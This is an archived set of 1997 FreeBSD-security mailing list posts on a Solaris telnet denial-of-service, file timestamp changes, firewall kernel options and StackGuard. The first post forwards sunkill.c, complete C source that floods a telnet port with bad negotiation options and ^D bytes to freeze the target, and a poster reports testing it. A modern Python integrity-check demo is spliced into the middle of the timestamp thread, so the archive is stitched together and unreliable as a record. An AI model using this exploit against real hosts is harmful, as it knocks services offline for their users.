From owner-freebsd-security Sun Dec 14 22:52:57 1997
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.7/8.8.7) id WAA27423 for security-outgoing; Sun, 14 Dec 1997 22:52:57 -0800 (PST) (envelope-from owner-freebsd-security)
Received: from shell6.ba.best.com (jkb@shell6.ba.best.com [206.184.139.137]) by hub.freebsd.org (8.8.7/8.8.7) with ESMTP id WAA27418 for ; Sun, 14 Dec 1997 22:52:54 -0800 (PST) (envelope-from jkb@best.com)
Received: from localhost (jkb@localhost) by shell6.ba.best.com (8.8.8/8.8.BEST) with SMTP id WAA03193 for ; Sun, 14 Dec 1997 22:52:53 -0800 (PST)
X-Authentication-Warning: shell6.ba.best.com: jkb owned process doing -bs
Date: Sun, 14 Dec 1997 22:52:52 -0800 (PST)
From: Jan Koum
X-Sender: jkb@shell6.ba.best.com
To: freebsd-security@freebsd.org
Subject: To kill a sun: (fwd)
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

Hi all,

I tried this against my 2.2.5-RELEASE machine which is on the ethernet with
another FreeBSD (3.0-CURRENT) machine. The 2.2.5 one is usually doing nothing
but running an rc5-64 client (Go team FreeBSD Japan!). Here is what top showed:

last pid: 20938;  load averages:  2.04,  1.65,  1.30    22:42:21
16 processes:  3 running, 13 sleeping
CPU states: 81.5% user,  0.0% nice,  5.0% system, 13.5% interrupt,  0.0% idle
Mem: 13M Active, 1152K Inact, 7564K Wired, 7624K Cache, 3606K Buf, 1896K Free
Swap: 128M Total, 96K Used, 128M Free

  PID USERNAME PRI NICE  SIZE   RES STATE    TIME   WCPU    CPU COMMAND
 3616 jkb       53  -20  824K  316K RUN    222.7H 68.89% 68.89% rc564
20923 root      63    0  192K  616K RUN      1:21 27.35% 27.35% telnetd
                                                        ^^^^^^^^^^^^^
16129 root       2    0  492K  720K select  15:33  1.45%  1.45% ppp
20932 jkb       29    0  600K  796K RUN      0:01  0.04%  0.04% top
  134 root      18    0  332K  416K pause    0:46  0.00%  0.00% cron
  171 jkb       18    4  452K  284K pause    0:00  0.00%  0.00% csh

Usually the load is at 1.00 since I have rc564 running with priority of -20.
But this time it was 2.xx -- I guess telnetd doubled it this time.

Running this against 3.0-CURRENT (from a week ago or so) wasn't as horrible
and showed this:

last pid:  4861;  load averages:  0.18,  0.65,  0.48    22:45:12
39 processes:  2 running, 37 sleeping
CPU states: 23.3% user,  0.0% nice,  3.9% system,  1.6% interrupt, 71.2% idle
Mem: 19M Active, 21M Inact, 11M Wired, 9384K Cache, 4942K Buf, 828K Free
Swap: 256M Total, 84M Used, 172M Free, 33% Inuse

  PID USERNAME PRI NICE   SIZE    RES STATE    TIME   WCPU    CPU COMMAND
 2894 jkb        2    0 40228K 14716K RUN    121:26  7.21%  7.21% netscape
 2867 jkb        2    0 19156K 15788K select  37:14  4.46%  4.46% Xaccel
 4855 root       2    0   204K   432K sbwait   0:00  2.22%  1.83% telnetd
                                                             ^^^^^^^^^^^^
 4858 jkb       28    0   820K   636K RUN      0:00  0.82%  0.61% top
 2868 jkb        2    0   436K   456K select   0:23  0.15%  0.15% afterstep
 3165 jkb        2    0   708K   344K select   0:01  0.08%  0.08% ssh

Does that mean that 2.2.5 is vulnerable to a little DoS? I am comparing it
to 3.0 which handles it with a lot of grace.

-- Yan

---------- Forwarded message ----------
Date: Sat, 13 Dec 1997 15:48:51 -0500
From: Jason Zapman II
To: BUGTRAQ@NETSPACE.ORG
Subject: To kill a sun:

This is sunkill.c

It affects at least Solaris 2.5.1 machines, both sun4c and sun4m
architectures. I imagine it affects all Solaris 2.5.1 machines, both sparc
and x86, but I'm not sure.

It basically works by opening a telnet connection on the victim machine and
sends a few bad telnet negotiation options, then floods the port with lots
of ^D characters. This uses all the streams memory (I think) on the victim's
machine and causes the kernel to get very angry. The machine crawls to a
halt, the cursor in X stops moving, the machine is unresponsive to the
network. It's a bad situation all around.

/*
** To make, if your system is BSD'ish:    gcc
**       ...if your system is SysV'ish:   gcc -lnsl -lsocket
**
** Usage: a.out
**
** Have fun!
*/

#include
#include
#include
#include
#include
#include
#include
#include

#define BUFSIZE 100
#define DOTS

void catchit(void)
{
    printf("\nCaught SIGPIPE -- your link may be too slow.\n");
    exit(1);
}

int main(int argc, char *argv[])
{
    unsigned char kludge_telopt[] = {IAC,WONT,TELOPT_TTYPE,IAC,DO, \
        TELOPT_SGA,IAC,WONT,TELOPT_XDISPLOC,IAC,WONT,TELOPT_NAWS,IAC,WONT, \
        TELOPT_OLD_ENVIRON,IAC,WONT,TELOPT_NEW_ENVIRON,IAC,DO,TELOPT_ECHO};
    unsigned char nastybuf[BUFSIZE];
    struct sockaddr_in sin;
    struct servent *sp;
    struct hostent *hp;
    int s;
    typedef void (*sig_t) (int);

    signal(SIGPIPE,(sig_t)catchit);
    memset(nastybuf,4,BUFSIZE);     /* ascii 4 = ^D */

    if (!(s = socket(AF_INET, SOCK_STREAM, 0))) {
        printf("no socket\n");
        exit(1);
    }
    if (!(hp = gethostbyname(argv[1]))) {
        printf("unknown host\n");
        exit(1);
    }
    bzero(&sin,sizeof(sin));
    bcopy(hp->h_addr,(char *)&sin.sin_addr,hp->h_length);
    sin.sin_family = AF_INET;
    sp = getservbyname("telnet","tcp");
    sin.sin_port = sp->s_port;
    if (connect(s,(struct sockaddr *)&sin,sizeof(sin)) == -1) {
        printf("can't connect to host\n");
        exit(1);
    }
    printf("connected to %s\n",argv[1]);
    write(s,kludge_telopt,21);      /* kludge some telnet negotiation */

    /* "Let them eat ^Ds..." */
    while (write(s,nastybuf,BUFSIZE) != -1) {
#ifdef DOTS
        write(STDOUT_FILENO,".",1);
#endif
    }
}

Jason

--
Jason Price        | If you want to build a ship, don't drum up people
Theta Xi,          | together to collect wood and don't assign them tasks
Beta, Alpha 449    | and work, but rather teach them to long for the endless
jprice@poboxes.com | immensity of the sea.
                   | -- Antoine de Saint Exupery

From owner-freebsd-security Mon Dec 15 10:06:12 1997
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.7/8.8.7) id KAA19790 for security-outgoing; Mon, 15 Dec 1997 10:06:12 -0800 (PST) (envelope-from owner-freebsd-security)
Received: (from root@localhost) by hub.freebsd.org (8.8.7/8.8.7) id KAA19237 for security@freebsd.org; Mon, 15 Dec 1997 10:02:41 -0800 (PST) (envelope-from owner-bugmaster@freebsd.org)
Date: Mon, 15 Dec 1997 10:02:41 -0800 (PST)
Message-Id: <199712151802.KAA19237@hub.freebsd.org>
From: FreeBSD bugmaster
To: security
Subject: Current problem reports assigned to you
Sender: owner-freebsd-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

Current FreeBSD problem reports

Critical problems

Serious problems

S Submitted     Tracker     Resp.             Description
-------------------------------------------------------------------------------
o [1997/11/20]  kern/5103   security-officer  It appears to be possible to lockup a Fre

1 problem total.

Non-critical problems

From owner-freebsd-security Tue Dec 16 16:51:25 1997
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.7/8.8.7) id QAA16915 for security-outgoing; Tue, 16 Dec 1997 16:51:25 -0800 (PST) (envelope-from owner-freebsd-security)
Received: from ohio.river.org (river.org [209.24.233.15]) by hub.freebsd.org (8.8.7/8.8.7) with ESMTP id QAA16910 for ; Tue, 16 Dec 1997 16:51:20 -0800 (PST) (envelope-from dhawk@ohio.river.org)
Received: (from dhawk@localhost) by ohio.river.org (8.8.8/8.7.3) id QAA14100 for freebsd-security@freebsd.org; Tue, 16 Dec 1997 16:51:08 -0800 (PST)
From: David Hawkins
Message-Id: <199712170051.QAA14100@ohio.river.org>
Subject: Is this something to worry about?
To: freebsd-security@freebsd.org
Date: Tue, 16 Dec 1997 16:51:08 -0800 (PST)
X-Mailer: ELM [version 2.4 PL23]
Content-Type: text
Sender: owner-freebsd-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

Background: today I did a make and install in /usr/ports/x11/XFree86
and XFree86-contrib and I thought I hadn't touched /usr/bin
but noticed this later in the day:

-r-xr-xr-x  1 bin  bin     123 Dec  6 07:02 linux
-r-xr-xr-x  1 bin  bin     122 Dec  6 07:02 qcam
-r-xr-xr-x  1 bin  bin   16384 Dec 16 05:00 tail
-r-xr-xr-x  1 bin  bin  126976 Dec 16 10:55 awk
-r-xr-xr-x  1 bin  bin   12288 Dec 16 11:35 du

That the last three files there were modified today. I'm not aware of
anything on the system that would have modified 'tail' at 5am.

Going to go by that Make book right now so I can figure some of this
out on my own. ;-) Thanks for any feedback, though.

later,
david
--
David Hawkins -- dhawk@river.org   http://www.river.org
If you take the small view, the universe is just something small and
round, like those water-filled balls which produce a miniature snowstorm
when you shake them. Although, unless the ineffable plan is a lot more
ineffable than it's given credit for, it does not have a large plastic
snowman at the bottom.
                -- (Terry Pratchett & Neil Gaiman, Good Omens)

From owner-freebsd-security Tue Dec 16 18:28:38 1997
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.7/8.8.7) id SAA26260 for security-outgoing; Tue, 16 Dec 1997 18:28:38 -0800 (PST) (envelope-from owner-freebsd-security)
Received: from word.smith.net.au (vh1.gsoft.com.au [203.38.152.122]) by hub.freebsd.org (8.8.7/8.8.7) with ESMTP id SAA26253 for ; Tue, 16 Dec 1997 18:28:31 -0800 (PST) (envelope-from mike@word.smith.net.au)
Received: from word (localhost [127.0.0.1]) by word.smith.net.au (8.8.8/8.8.5) with ESMTP id MAA01090; Wed, 17 Dec 1997 12:52:43 +1030 (CST)
Message-Id: <199712170222.MAA01090@word.smith.net.au>
X-Mailer: exmh version 2.0zeta 7/24/97
To: David Hawkins
cc: freebsd-security@freebsd.org
Subject: Re: Is this something to worry about?
In-reply-to: Your message of "Tue, 16 Dec 1997 16:51:08 -0800." <199712170051.QAA14100@ohio.river.org>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Wed, 17 Dec 1997 12:52:42 +1030
From: Mike Smith
Sender: owner-freebsd-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

> Background: today I did a make and install in /usr/ports/x11/XFree86
> and XFree86-contrib and I thought I hadn't touched /usr/bin
> but noticed this later in the day:
>
> -r-xr-xr-x  1 bin  bin     123 Dec  6 07:02 linux
> -r-xr-xr-x  1 bin  bin     122 Dec  6 07:02 qcam
> -r-xr-xr-x  1 bin  bin   16384 Dec 16 05:00 tail
> -r-xr-xr-x  1 bin  bin  126976 Dec 16 10:55 awk
> -r-xr-xr-x  1 bin  bin   12288 Dec 16 11:35 du
>
> That the last three files there were modified today. I'm not aware of
> anything on the system that would have modified 'tail' at 5am.

This is a "feature" of the system; occasionally executables appear to
be written to while they're running. Nobody has been able to work out
why; the write doesn't appear to change any of the actual contents of
the file.
mike

From owner-freebsd-security Tue Dec 16 18:45:40 1997
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.7/8.8.7) id SAA27267 for security-outgoing; Tue, 16 Dec 1997 18:45:40 -0800 (PST) (envelope-from owner-freebsd-security)
Received: from cheops.anu.edu.au (avalon@cheops.anu.edu.au [150.203.76.24]) by hub.freebsd.org (8.8.7/8.8.7) with ESMTP id SAA27242 for ; Tue, 16 Dec 1997 18:45:34 -0800 (PST) (envelope-from avalon@coombs.anu.edu.au)
Message-Id: <199712170245.SAA27242@hub.freebsd.org>
Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA262326616; Wed, 17 Dec 1997 13:43:36 +1100
From: Darren Reed
Subject: Re: Is this something to worry about?
To: dhawk@river.org (David Hawkins)
Date: Wed, 17 Dec 1997 13:43:36 +1100 (EDT)
Cc: freebsd-security@FreeBSD.ORG
In-Reply-To: <199712170051.QAA14100@ohio.river.org> from "David Hawkins" at Dec 16, 97 04:51:08 pm
X-Mailer: ELM [version 2.4 PL23]
Content-Type: text
Sender: owner-freebsd-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

In some mail from David Hawkins, sie said:
>
> Background: today I did a make and install in /usr/ports/x11/XFree86
> and XFree86-contrib and I thought I hadn't touched /usr/bin
> but noticed this later in the day:
>
> -r-xr-xr-x  1 bin  bin     123 Dec  6 07:02 linux
> -r-xr-xr-x  1 bin  bin     122 Dec  6 07:02 qcam
> -r-xr-xr-x  1 bin  bin   16384 Dec 16 05:00 tail
> -r-xr-xr-x  1 bin  bin  126976 Dec 16 10:55 awk
> -r-xr-xr-x  1 bin  bin   12288 Dec 16 11:35 du
>
> That the last three files there were modified today. I'm not aware of
> anything on the system that would have modified 'tail' at 5am.

You haven't used something like "file(1)" on them or some other program
that changes the inode using utimes, have you ?
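The question just asked (could some utility have touched the inode times without touching the bytes?) and the conclusion reached further down this thread (compare content digests, as mtree(8) does with its md5digest keyword, rather than timestamps) are easy to demonstrate. The following is an added example, not code from this thread or from FreeBSD: over a constructed directory with two stand-in "binaries" it records mtime and MD5 per file, then plays out two events. A touch-style mtime change with unchanged contents sets off the timestamp check but not the digest check, and a real content change whose mtime was put back with utimes(2) slips past the timestamp check but is caught by the digest. The directory, file names and contents are constructed for the demo.

```python
import hashlib
import os
import shutil
import tempfile
from typing import Dict, List, Tuple

# Baseline record per file: (mtime in nanoseconds, MD5 hex digest of the bytes).
Record = Tuple[int, str]


def md5_of(path: str) -> str:
    """MD5 of the file's contents, read in chunks; independent of inode times."""
    h = hashlib.md5()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot(root: str) -> Dict[str, Record]:
    """Record mtime and digest for every regular file under root (symlinks skipped)."""
    records: Dict[str, Record] = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            if os.path.islink(path) or not os.path.isfile(path):
                continue
            st = os.stat(path)
            records[os.path.relpath(path, root)] = (st.st_mtime_ns, md5_of(path))
    return records


def changed_by_mtime(base: Dict[str, Record], cur: Dict[str, Record]) -> List[str]:
    """The 'find | xargs ls | sort' style check: flag a file whenever its mtime moved."""
    return sorted(p for p in base if p in cur and cur[p][0] != base[p][0])


def changed_by_digest(base: Dict[str, Record], cur: Dict[str, Record]) -> List[str]:
    """The 'mtree -K md5digest' style check: flag a file only when its bytes changed."""
    return sorted(p for p in base if p in cur and cur[p][1] != base[p][1])


def demo() -> Dict[str, List[str]]:
    """Constructed scenario: two stand-in binaries, one timestamp-only event, one real change."""
    root = tempfile.mkdtemp(prefix="integrity-demo-")
    try:
        tail = os.path.join(root, "tail")   # names echo the listing in the thread
        awk = os.path.join(root, "awk")
        with open(tail, "wb") as fh:
            fh.write(b"\x7fELF constructed stand-in for /usr/bin/tail\n")
        with open(awk, "wb") as fh:
            fh.write(b"\x7fELF constructed stand-in for /usr/bin/awk\n")

        base = snapshot(root)

        # Event 1: something rewrote tail's inode times but not its contents,
        # the situation the thread describes (mtime moves, bytes do not).
        st = os.stat(tail)
        os.utime(tail, ns=(st.st_atime_ns, st.st_mtime_ns + 3600 * 10**9))

        # Event 2: awk's contents really changed, and the original mtime was
        # put back afterwards with utimes(2); that needs only write access,
        # which is why an mtime is not evidence of integrity.
        with open(awk, "wb") as fh:
            fh.write(b"\x7fELF constructed stand-in for a replaced awk\n")
        st = os.stat(awk)
        os.utime(awk, ns=(st.st_atime_ns, base["awk"][0]))

        cur = snapshot(root)
        return {
            "mtime": changed_by_mtime(base, cur),    # -> ['tail']  (false alarm, real change missed)
            "digest": changed_by_digest(base, cur),  # -> ['awk']   (the real change)
        }
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    print(demo())
```

Run it with python3; demo() returns which files each method would report. The baseline dictionary is the part worth protecting in practice: if it lives on the same writable filesystem as the binaries it describes, it can be regenerated along with them, so keep it on read-only media or off the host.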
From owner-freebsd-security Tue Dec 16 19:38:53 1997
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.7/8.8.7) id TAA02251 for security-outgoing; Tue, 16 Dec 1997 19:38:53 -0800 (PST) (envelope-from owner-freebsd-security)
Received: from dyson.iquest.net (dyson.iquest.net [198.70.144.127]) by hub.freebsd.org (8.8.7/8.8.7) with ESMTP id TAA02246 for ; Tue, 16 Dec 1997 19:38:50 -0800 (PST) (envelope-from toor@dyson.iquest.net)
Received: (from root@localhost) by dyson.iquest.net (8.8.8/8.8.8) id WAA01537; Tue, 16 Dec 1997 22:38:17 -0500 (EST) (envelope-from toor)
From: "John S. Dyson"
Message-Id: <199712170338.WAA01537@dyson.iquest.net>
Subject: Re: Is this something to worry about?
In-Reply-To: <199712170222.MAA01090@word.smith.net.au> from Mike Smith at "Dec 17, 97 12:52:42 pm"
To: mike@smith.net.au (Mike Smith)
Date: Tue, 16 Dec 1997 22:38:16 -0500 (EST)
Cc: dhawk@river.org, freebsd-security@FreeBSD.ORG
X-Mailer: ELM [version 2.4ME+ PL31 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

Mike Smith said:
> > Background: today I did a make and install in /usr/ports/x11/XFree86
> > and XFree86-contrib and I thought I hadn't touched /usr/bin
> > but noticed this later in the day:
> >
> > -r-xr-xr-x  1 bin  bin     123 Dec  6 07:02 linux
> > -r-xr-xr-x  1 bin  bin     122 Dec  6 07:02 qcam
> > -r-xr-xr-x  1 bin  bin   16384 Dec 16 05:00 tail
> > -r-xr-xr-x  1 bin  bin  126976 Dec 16 10:55 awk
> > -r-xr-xr-x  1 bin  bin   12288 Dec 16 11:35 du
> >
> > That the last three files there were modified today. I'm not aware of
> > anything on the system that would have modified 'tail' at 5am.
>
> This is a "feature" of the system; occasionally executables appear to
> be written to while they're running. Nobody has been able to work out
> why; the write doesn't appear to change any of the actual contents of
> the file.
>
I think that it has been fixed in the 3.0 line of code. Let me know if
there is ANY of this happening on -current!

--
John                  | Never try to teach a pig to sing,
dyson@freebsd.org     | it just makes you look stupid, and
jdyson@nc.com         | it irritates the pig.

From owner-freebsd-security Wed Dec 17 07:40:30 1997
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.7/8.8.7) id HAA19064 for security-outgoing; Wed, 17 Dec 1997 07:40:30 -0800 (PST) (envelope-from owner-freebsd-security)
Received: from mbox.tu-graz.ac.at (mbox.tu-graz.ac.at [129.27.2.6]) by hub.freebsd.org (8.8.7/8.8.7) with SMTP id HAA19049 for ; Wed, 17 Dec 1997 07:40:24 -0800 (PST) (envelope-from dada@localhost.tu-graz.ac.at)
Received: from fcggsg07.icg.tu-graz.ac.at by mbox.tu-graz.ac.at with SMTP id AA05651 (5.67c/IDA-1.5t for ); Wed, 17 Dec 1997 16:40:39 +0100
Received: from localhost.tu-graz.ac.at (isdn095.tu-graz.ac.at [129.27.240.95]) by fcggsg07.icg.tu-graz.ac.at (8.8.8/8.8.8) with ESMTP id QAA07664; Wed, 17 Dec 1997 16:39:39 +0100 (MET)
Received: from localhost (localhost.tu-graz.ac.at [127.0.0.1]) by localhost.tu-graz.ac.at (8.8.5/8.8.5) with SMTP id IAA02240; Wed, 17 Dec 1997 08:05:02 +0100 (CET)
Date: Wed, 17 Dec 1997 08:05:02 +0100 (CET)
From: Martin Kammerhofer
Reply-To: Martin Kammerhofer
To: David Hawkins
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Is this something to worry about?
In-Reply-To: <199712170222.MAA01090@word.smith.net.au>
Message-Id:
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

On Wed, 17 Dec 1997, Mike Smith wrote:

> >
> > That the last three files there were modified today. I'm not aware of
> > anything on the system that would have modified 'tail' at 5am.
>
> This is a "feature" of the system; occasionally executables appear to
> be written to while they're running.
> Nobody has been able to work out
> why; the write doesn't appear to change any of the actual contents of
> the file.
>
> mike
>

And it breaks things like tripwire ;-I

From owner-freebsd-security Wed Dec 17 09:56:25 1997
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.7/8.8.7) id JAA27997 for security-outgoing; Wed, 17 Dec 1997 09:56:25 -0800 (PST) (envelope-from owner-freebsd-security)
Received: from ymris.ddm.on.ca (cisco7-152.cas.golden.net [207.216.76.152]) by hub.freebsd.org (8.8.7/8.8.7) with ESMTP id JAA27989 for ; Wed, 17 Dec 1997 09:56:17 -0800 (PST) (envelope-from dchapes@ddm.on.ca)
Received: from squigy.ddm.on.ca (squigy.ddm.on.ca [209.47.139.138]) by ymris.ddm.on.ca (8.8.7/8.8.8) with ESMTP id MAA04254 for ; Wed, 17 Dec 1997 12:55:41 -0500 (EST) (envelope-from dchapes@ymris.ddm.on.ca)
Received: (from dchapes@localhost) by squigy.ddm.on.ca (8.8.7/8.8.7) id MAA17520; Wed, 17 Dec 1997 12:55:40 -0500 (EST)
Message-ID: <19971217125540.06561@ddm.on.ca>
Date: Wed, 17 Dec 1997 12:55:40 -0500
From: Dave Chapeskie
To: freebsd-security@FreeBSD.ORG
Subject: Re: Is this something to worry about?
References: <199712170222.MAA01090@word.smith.net.au>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.81
In-Reply-To: ; from Martin Kammerhofer on Wed, Dec 17, 1997 at 08:05:02AM +0100
Sender: owner-freebsd-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

On Wed, 17 Dec 1997, Mike Smith wrote:
> This is a "feature" of the system; occasionally executables appear to
> be written to while they're running. Nobody has been able to work out
> why; the write doesn't appear to change any of the actual contents of
> the file.

On Wed, Dec 17, 1997 at 08:05:02AM +0100, Martin Kammerhofer wrote:
> And it breaks things like tripwire ;-I

Things like tripwire should be looking at the md5, not the timestamp.
The same thing goes for the stuff in /etc/security that uses an ugly
find | xargs ls | sort pipe to get a list of suid timestamps. This is
silly and useless when they should be using mtree(8) with the "md5digest"
keyword.

--
Dave Chapeskie, DDM Consulting
E-Mail: dchapes@ddm.on.ca

From owner-freebsd-security Thu Dec 18 08:17:38 1997
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.7/8.8.7) id IAA29125 for security-outgoing; Thu, 18 Dec 1997 08:17:38 -0800 (PST) (envelope-from owner-freebsd-security)
Received: from homeport.org (lighthouse.homeport.org [205.136.65.198]) by hub.freebsd.org (8.8.7/8.8.7) with ESMTP id IAA29110 for ; Thu, 18 Dec 1997 08:17:31 -0800 (PST) (envelope-from adam@homeport.org)
Received: (adam@localhost) by homeport.org (8.8.5/8.6.9) id LAA14478; Thu, 18 Dec 1997 11:15:03 -0500 (EST)
From: Adam Shostack
Message-Id: <199712181615.LAA14478@homeport.org>
Subject: Kernel options for FW?
To: firewall-wizards@nfr.net (Firewall Wizards List), freebsd-security@FreeBSD.ORG
Date: Thu, 18 Dec 1997 11:15:02 -0500 (EST)
X-Mailer: ELM [version 2.4ME+ PL27 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

(This is not meant to spark a religious war. I'm asking for help
configuring a kernel, and comparing kernel security features between
FreeBSD and NetBSD to make a reasonable decision.)

On Netbsd, I'd enable the following options. I can't find equivalents
to these on FreeBSD. Do they exist, and what are they? Also, I know
Freebsd sets kernel security wrong (-1) by default, and that needs to
be fixed. Are there other things that I should know about on Freebsd
to do everything right?

options IPFORWSRCRT=0           //Turn off source routing.
options IPNOPRIVPORTS           //Remove concept of priv'd ports so BIND doesn't
                                //need to run as root.
options IPFILTER_DEFAULT_BLOCK  //Put my FW policy in the kernel.
options FDSCRIPTS               // Allow a script to be run if it is x only, by
                                // passing a file descriptor to the interpreter,
                                // avoiding some race conditions.

Adam

--
"It is seldom that liberty of any kind is lost all at once."
                                               -Hume

From owner-freebsd-security Thu Dec 18 09:33:35 1997
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.7/8.8.7) id JAA05800 for security-outgoing; Thu, 18 Dec 1997 09:33:35 -0800 (PST) (envelope-from owner-freebsd-security)
Received: from Kitten.mcs.com (Kitten.mcs.com [192.160.127.90]) by hub.freebsd.org (8.8.7/8.8.7) with ESMTP id JAA05793 for ; Thu, 18 Dec 1997 09:33:33 -0800 (PST) (envelope-from nash@Jupiter.Mcs.Net)
Received: from Jupiter.Mcs.Net (nash@Jupiter.mcs.net [192.160.127.88]) by Kitten.mcs.com (8.8.7/8.8.2) with ESMTP id LAA11863; Thu, 18 Dec 1997 11:33:32 -0600 (CST)
Received: from localhost (nash@localhost) by Jupiter.Mcs.Net (8.8.7/8.8.2) with SMTP id LAA04388; Thu, 18 Dec 1997 11:33:31 -0600 (CST)
Date: Thu, 18 Dec 1997 11:33:31 -0600 (CST)
From: Alex Nash
To: Adam Shostack
cc: Firewall Wizards List , freebsd-security@FreeBSD.ORG
Subject: Re: Kernel options for FW?
In-Reply-To: <199712181615.LAA14478@homeport.org>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

On Thu, 18 Dec 1997, Adam Shostack wrote:

> options IPFORWSRCRT=0           //Turn off source routing.

This is the default. It is controllable via sysctl.

> options IPNOPRIVPORTS           //Remove concept of priv'd ports so BIND doesn't
>                                 //need to run as root.

I don't know if there's a good way of doing this, but you could hack
IPPORT_RESERVED in in.h (unfortunately this isn't surrounded by an
ifndef, so you can't just throw options IPPORT_RESERVED into your kernel
config).

> options IPFILTER_DEFAULT_BLOCK  //Put my FW policy in the kernel.

This is the default for FreeBSD's ipfw.
Alex

From owner-freebsd-security Fri Dec 19 02:53:11 1997
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.7/8.8.7) id CAA10856 for security-outgoing; Fri, 19 Dec 1997 02:53:11 -0800 (PST) (envelope-from owner-freebsd-security)
Received: from firewall.ftf.dk (root@mail.ftf.dk [129.142.64.2]) by hub.freebsd.org (8.8.7/8.8.7) with ESMTP id CAA10850 for ; Fri, 19 Dec 1997 02:53:06 -0800 (PST) (envelope-from regnauld@deepo.prosa.dk)
Received: from mail.prosa.dk ([192.168.100.2]) by firewall.ftf.dk (8.7.6/8.7.3) with ESMTP id NAA09665 for ; Fri, 19 Dec 1997 13:32:18 +0100
Received: from deepo.prosa.dk (deepo.prosa.dk [192.168.100.10]) by mail.prosa.dk (8.8.5/8.8.5/prosa-1.1) with ESMTP id MAA04463 for ; Fri, 19 Dec 1997 12:20:02 +0100 (CET)
Received: (from regnauld@localhost) by deepo.prosa.dk (8.8.7/8.8.5/prosa-1.1) id LAA08705; Fri, 19 Dec 1997 11:52:02 +0100 (CET)
Message-ID: <19971219115202.29626@deepo.prosa.dk>
Date: Fri, 19 Dec 1997 11:52:02 +0100
From: Philippe Regnauld
To: freebsd-security@freebsd.org
Subject: Fwd: "StackGuard: Automatic Protection From Stack-smashing Attacks"
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.88e
X-Operating-System: FreeBSD 2.2.5-RELEASE i386
Sender: owner-freebsd-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

Anybody ever used this ? Potential overhead ?

-----Forwarded message from Crispin Cowan -----

Date: Thu, 18 Dec 1997 21:34:39 -0800
From: Crispin Cowan
Subject: StackGuard: Automatic Protection From Stack-smashing Attacks
To: BUGTRAQ@NETSPACE.ORG

StackGuard: Automatic Detection and Prevention of Buffer-Overflow Attacks

StackGuard provides a systematic solution to the persistent problem of
buffer overflow attacks. Buffer overflow attacks gained notoriety in 1988
as part of the Morris Worm incident on the Internet. While it is fairly
simple to fix individual buffer overflow vulnerabilities, buffer overflow
attacks continue to this day.
Hundreds of attacks have been discovered, and while most of the obvious
vulnerabilities have now been patched, more sophisticated buffer overflow
attacks continue to emerge.

StackGuard is a simple compiler technique that virtually eliminates buffer
overflow vulnerabilities with only modest performance penalties. Privileged
programs that are recompiled with the StackGuard compiler extension no
longer yield control to the attacker, but rather enter a fail-safe state.
These programs require no source code changes at all, and are
binary-compatible with existing operating systems and libraries.

StackGuard is intended to protect buggy software against stack smashing
attacks, even those attacks that have not yet been discovered. For
instance, even though StackGuard was developed prior to the public
announcement of the Samba stack smashing vulnerability, the same vulnerable
Samba code when compiled with StackGuard protection was not vulnerable to
the attack.

A paper describing StackGuard will appear in the 1998 USENIX Security
Conference. A pre-print of the paper is available (postscript and HTML)
here:

        http://www.cse.ogi.edu/DISC/projects/immunix/StackGuard/

Source for the StackGuard-enhanced gcc is also here. This software is
available under the usual GPL (GNU Public License) rules.

Security people are invited to download and evaluate StackGuard.
StackGuard may be of particular interest to system administrators seeking
to protect their hosts from attack. The compiler is very stable; for
instance, a StackGuard-enhanced gcc can compile itself correctly. Programs
compiled with StackGuard should both compile and link without complaint.
However, since this is a first release of StackGuard, I still recommend
that privileged software be kept up to date with respect to security
announcements.

I am very interested in feedback on StackGuard. Naturally, all the usual
feedback is requested (bugs, security vulnerabilities, comments on the
design, etc.).
Of *particular* interest is any alarms that StackGuard sets off: if
someone attempts to apply a stack-smashing attack to a
StackGuard-protected program, the program will halt with an error message
instead of yielding a root shell. This message *may* indicate the
discovery of a new stack-smashing vulnerability: please report it both to
me. If your version of the program is current, then you may also wish to
report the problem to the author of the program in question.

I wish to thank the many contributors to the BUGTRAQ mailing list. The
background information provided by BUGTRAQ was invaluable to this
research.

I am aware that there are other stack smashing solutions, and they are
described and cited in the paper.

Crispin
-----
Crispin Cowan, Research Assistant Professor of Computer Science
Oregon Graduate Institute       | Electronically:
